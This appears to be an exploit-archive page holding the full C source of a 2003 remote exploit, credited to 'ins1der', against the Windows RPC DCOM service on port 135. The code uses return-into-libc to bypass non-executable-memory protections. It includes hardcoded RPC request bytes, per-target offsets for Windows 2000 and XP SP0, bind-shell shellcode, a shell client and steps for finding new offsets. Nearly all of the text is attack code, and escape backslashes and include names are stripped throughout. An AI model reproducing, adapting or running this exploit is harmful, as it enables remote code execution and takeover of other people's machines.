Summary:A vulnerability in the RPC server allows remote attackers to cause the service to execute arbitrary code. The following exploit code can be used to test your system for the mentioned vulnerability, even if the following protection mechanisms have been implemented: OverflowGuard or StackDefender.
Exploit:
/*
* have you recently bought one of those expensive new windows security products
* on the market? do you think you now have strong protection?
* Look again:
*
* *rpc!exec*
* by ins1der (trixterjack yahoo com)
*
* windows remote return into libc exploit!
*
* remote rpc exploit breaking non exec memory protection schemes
* tested against :
* OverflowGuard
* StackDefender (kernel32 imagebase randomization:O nice try guys.)
*
*
* currently breaking:
* Windows 2000 SP0 (english)
* Windows XP SP0 (english)
*
* to get new offsets use this:
* ------------------------------
* #include
* #include
*
* int main()
* {
* HANDLE h1,h2;
* unsigned long addr1,addr2,addr3,addr4;
* h1=LoadLibrary("ntdll.dll");
* h2=LoadLibrary("MSVCRT.dll");
* addr1=(unsigned long)GetProcAddress(h1,"NtAllocateVirtualMemory");
* addr2=(unsigned long)GetProcAddress(h2,"memcpy");
* addr3=(unsigned long)GetProcAddress(h1,"NtProtectVirtualMemory");
* for (addr4=addr1;addr4
* {
* if (!memcmp((void*)addr4,"xc9xc3",2)) break;
* }
* printf("0x%x 0x%x 0x%x 0x%xn",addr1,addr2,addr3,addr4);
* return 0;
* }
* -----------------------------
* to get the last offset use a standard rpc dcom exploit with the last
* x90x90 before the shellcode replaced with xcdx21. run the exploit
* and read the drwatson logs. substract 0xA5 from the fault address.
*
*
* Shouts go to:
* w00pz, SpaceCow, Int3, lacroix, misu200, j00(xor),
* s0ny, crisis, and to all my true friends.
*
*
* Enjoy!
*
*/
#include
#include
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
};
unsigned char request3[]={
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
unsigned char request4[]={
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
struct offset
{
char *description;
unsigned long valloc;
unsigned long amemcpy;
unsigned long vprot;
unsigned long ret;
unsigned long frame;
};
struct offset targets[]=
{
{"Windows 2000 SP0 (english)",
0x77f95da9,
0x78001194,
0x77f82ffb,
0x77f96800,
0x52f770
}
,
{"Windows XP SP0 (english)",
0x77f7e4c3,
0x77c42e10,
0x77f7ec43,
0x77f80a07,
0x5bf79c
}
,
{NULL,0,0,0,0,0}
};
unsigned char shell[]=
"x46x00x58x00"
"x4Ex00x42x00"
"x46x00x58x00"
"x46x00x58x00"
"x4Ex00x42x00x46x00x58x00x46x00x58x00x46x00x58x00"
"xffxffxffxff"
"xffxffxffxff"
"xccxe0xfdx7f"
"xccxe0xfdx7f"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90"
"x83xecx34x8bxf4xe8x47x01x00x00x89x06xffx36x68x8e"
"x4ex0execxe8x61x01x00x00x89x46x08xffx36x68xadxd9"
"x05xcexe8x52x01x00x00x89x46x0cx68x6cx6cx00x00x68"
"x33x32x2ex64x68x77x73x32x5fx54xffx56x08x89x46x04"
"xffx36x68x72xfexb3x16xe8x2dx01x00x00x89x46x10xff"
"x36x68xefxcexe0x60xe8x1ex01x00x00x89x46x14xffx76"
"x04x68xcbxedxfcx3bxe8x0ex01x00x00x89x46x18xffx76"
"x04x68xd9x09xf5xadxe8xfex00x00x00x89x46x1cxffx76"
"x04x68xa4x1ax70xc7xe8xeex00x00x00x89x46x20xffx76"
"x04x68xa4xadx2exe9xe8xdex00x00x00x89x46x24xffx76"
"x04x68xe5x49x86x49xe8xcex00x00x00x89x46x28xffx76"
"x04x68xe7x79xc6x79xe8xbex00x00x00x89x46x2cx33xff"
"x81xecx90x01x00x00x54x68x01x01x00x00xffx56x18x50"
"x50x50x50x40x50x40x50xffx56x1cx8bxd8x57x57x68x02"
"x00x1cx07x8bxccx6ax16x51x53xffx56x20x57x53xffx56"
"x24x57x51x53xffx56x28x8bxd0x68x65x78x65x00x68x63"
"x6dx64x2ex89x66x30x83xecx54x8dx3cx24x33xc0x33xc9"
"x83xc1x15xabxe2xfdxc6x44x24x10x44xfex44x24x3dx89"
"x54x24x48x89x54x24x4cx89x54x24x50x8dx44x24x10x54"
"x50x51x51x51x6ax01x51x51xffx76x30x51xffx56x10x8b"
"xccx6axffxffx31xffx56x0cx8bxc8x57xffx56x2cxffx56"
"x14x55x56x64xa1x30x00x00x00x85xc0x78x0cx8bx40x0c"
"x8bx70x1cxadx8bx68x08xebx09x8bx40x34x8bxa8xb8x00"
"x00x00x8bxc5x5ex5dxc2x04x00x53x55x56x57x8bx6cx24"
"x18x8bx45x3cx8bx54x05x78x03xd5x8bx4ax18x8bx5ax20"
"x03xddxe3x32x49x8bx34x8bx03xf5x33xffxfcx33xc0xac"
"x3axc4x74x07xc1xcfx0dx03xf8xebxf2x3bx7cx24x14x75"
"xe1x8bx5ax24x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8b"
"x04x8bx03xc5xebx02x33xc0x8bxd5x5fx5ex5dx5bxc2x04"
"x00x90x90x90x80xbfx32x94x80xbfx32x94";
struct frame1
{
unsigned long frame0;
unsigned long ret;
}fr1;
struct retstruct
{
unsigned long frame1;
unsigned long valloc;
unsigned long ret1;
unsigned long dummy1;
unsigned long pointer11;
unsigned long zero;
unsigned long pointer12;
unsigned long type;
unsigned long prot;
unsigned long frame2;
unsigned long amemcpy;
unsigned long ret2;
unsigned long dest;
unsigned long src;
unsigned long size2;
unsigned long frame3;
unsigned long vprot;
unsigned long ret3;
unsigned long dummy2;
unsigned long pointer21;
unsigned long pointer22;
unsigned long newprot;
unsigned long oldprot;
}rets;
void prepare_ret(int id)
{
rets.type=0x3000;
rets.prot=0x4;
rets.newprot=0x20;
rets.valloc=targets[id].valloc;
rets.amemcpy=targets[id].amemcpy;
rets.vprot=targets[id].vprot;
fr1.ret=rets.ret1=rets.ret2=targets[id].ret;
fr1.frame0=targets[id].frame;
rets.frame1=fr1.frame0+9*4;
rets.frame2=rets.frame1+6*4;
rets.oldprot=fr1.frame0;
rets.frame3=rets.frame1;
rets.size2=sizeof(shell);
rets.src=fr1.frame0;
rets.dest=0x55555000;
rets.ret3=0x5555506c;
rets.dummy1=rets.dummy2=0xffffffff;
rets.zero=0;
*(int*)(shell+148)=0x55555000;
*(int*)(shell+152)=sizeof(shell);
*(int*)(shell+140)=0x55555000;
*(int*)(shell+144)=sizeof(shell);
rets.pointer11=fr1.frame0+92;
rets.pointer12=fr1.frame0+96;
rets.pointer21=fr1.frame0+100;
rets.pointer22=fr1.frame0+104;
memcpy(shell+32,&fr1,sizeof(fr1));
memcpy(shell+48,&rets,sizeof(rets));
}
void entershell(int sock)
{
char buf[3000];
fd_set fdr;
int rs;
FD_ZERO(&fdr);
FD_SET(sock,&fdr);
FD_SET(0,&fdr);
for(;;)
{
FD_SET(sock, &fdr);
FD_SET(0, &fdr);
if(select(FD_SETSIZE,&fdr,NULL,NULL,NULL)<0) break;
if(FD_ISSET(sock, &fdr))
{
if((rs=read(sock,buf,sizeof(buf)))<0)
{
printf("connection lostn");
return;
}
if(write(1,buf,rs)<0) break;
}
if(FD_ISSET(0,&fdr))
{
if((rs=read(0,buf,sizeof(buf)))<0)
{
printf("[-] Connection lost..n");
exit(1);
}
if (write(sock,buf,rs) < 0) break;
}
usleep(100);
}
printf("connection closedn");
return;
}
int main(int argc, char **argv)
{
int sock,i,len1;
struct sockaddr_in sin;
unsigned char buf1[0x1000],buf2[0x1000];
if(argc<3)
{
printf("###############################n");
printf("return into libc rpc exploitn");
printf("ins1der 2003n");
printf("downloaded on www.k-otik.comn");
printf("*****************************************n");
printf("usage: %s n", argv[0]);
printf("*****************************************n");
printf("targets:n");
printf("-----------------------------------------n");
for (i=0;targets[i].description!= NULL;i++)
{
printf("%dt%sn",i,targets[i].description);
}
printf("-----------------------------------------n");
return 0;
}
printf("Exploiting %s...n",argv[1]);
prepare_ret(atoi(argv[2]));
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=inet_addr(argv[1]);
sin.sin_port=htons(135);
if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror("socket ");
return 0;
}
if(connect(sock,(struct sockaddr*)&sin, sizeof(sin)))
{
perror("connect ");
return 0;
}
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);
*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(shell)/2;
*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(shell)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,shell,sizeof(shell));
len1=len1+sizeof(shell);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(shell)-0xc;
if (send(sock,(char*)bindstr,sizeof(bindstr),0)==-1)
{
perror("send");
return 0;
}
recv(sock,(char*)buf1,1000,0);
if (send(sock,(char*)buf2,len1,0)== -1)
{
perror("send");
return 0;
}
close(sock);
sleep(1);
sin.sin_port = htons(7175);
if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("socket");
return(0);
}
if(connect(sock,(struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
{
printf("Exploit failedn");
return(0);
}
printf("Entering shelln");
entershell(sock);
return 1;
}
|
